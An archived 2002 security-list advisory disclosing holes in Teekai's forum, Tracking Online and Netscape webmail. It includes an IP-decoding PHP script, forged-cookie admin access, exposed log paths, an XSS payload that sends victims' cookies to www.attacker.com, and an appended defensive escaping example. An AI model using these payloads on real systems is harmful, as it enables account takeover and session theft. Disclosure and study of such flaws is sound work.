Hi :)

Products :
**********
Tracking Online 1.0
Teekai's forum full 1.2
http://www.teekai.info

Problems :
**********
Tracking Online & Teekai's forum :
- Information recovery
- Information decoding

Teekai's forum :
- Admin access
- Small holes

Tracking Online :
- XSS

Exploits :
**********
Forum & Tracking :
- PHP file to decode information :

<?
// $cryptedip holds the encoded dotted value; split it into its four parts.
$cryptedip = explode('.', $cryptedip);
// The key is derived from the fixed string "20".
$key = md5("20");
// Divide each part by the key to recover the original address.
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>

Forum :
- /data/member_log.txt
- Setcookie "valid_level=admin"
- Setcookie "valid_username_online=[VALUE e.g. JScript ]"
- ...

Tracking Online :
- /data/userlog/log.txt
- /userlog.php
- ...

More details in French :
http://www.ifrance.com/kitetoua/tuto/Teekai.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

There is a security hole in the mail service that Netscape offers (http://ncmail.netscape.com). It makes it possible to inject HTML into an e-mail, and this service authenticates by cookies. The hole consists of sending a mail whose subject is a JScript preceded by: ";</script*> . The idea would be a script of this kind in the subject:

";</script*><form name=a*><input name=o value=http://www.attacker.com/script?*></form*><script*>window.open (document.a.o.value+document.cookie)</script*>

without the '*'. I use <form> because " and ' are replaced by \" or \'.

The vendors were informed but did not repair it. Maybe more details soon...

Sorry for my poor English.

frog-m@n
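Added example, not part of the original post and not code from either vendor: it contrasts the quote-only escaping the post reports with escaping that keeps a subject inside an inline script block. The page template, the function names and the sample subject are assumptions constructed for illustration.

```javascript
// Assumed template: the mail subject is written into a JavaScript string
// inside an inline <script> element (the post does not show the real page).
function renderSubject(subject, escapeFn) {
  return '<script>var subject = "' + escapeFn(subject) + '";</script>';
}

// Weak: only quotes and backslashes are escaped, matching the behaviour the
// post reports (" and ' become \" and \').
function escapeQuotesOnly(s) {
  return s.replace(/[\\"']/g, (c) => '\\' + c);
}

// Hardened: also escape the characters the HTML parser acts on, plus line
// terminators, as \uXXXX so the value never leaves the string literal.
function escapeForInlineScript(s) {
  return s.replace(/[\\"'<>&\/\u2028\u2029\r\n]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The HTML parser ends a script element at the first "</script", whatever
// the JavaScript string state is. Return the markup that lands after that
// first end tag; an empty string means nothing escaped the element.
function markupOutsideScript(html) {
  const body = html.slice('<script>'.length);
  const start = body.toLowerCase().indexOf('</script');
  const end = body.indexOf('>', start);
  return body.slice(end + 1);
}

// Constructed, harmless sample subject that uses the same break-out prefix.
const SAMPLE_SUBJECT = '";</script><b>injected</b>';

function demo() {
  const weak = renderSubject(SAMPLE_SUBJECT, escapeQuotesOnly);
  const hard = renderSubject(SAMPLE_SUBJECT, escapeForInlineScript);
  return {
    weakLeak: markupOutsideScript(weak),
    hardLeak: markupOutsideScript(hard),
  };
}

console.log(demo());
```

Backslash-escaping quotes protects only the JavaScript string; the HTML tokenizer runs first and closes the element on the literal end tag, which is why the weak variant leaks markup.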
This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 13:42:11 PDT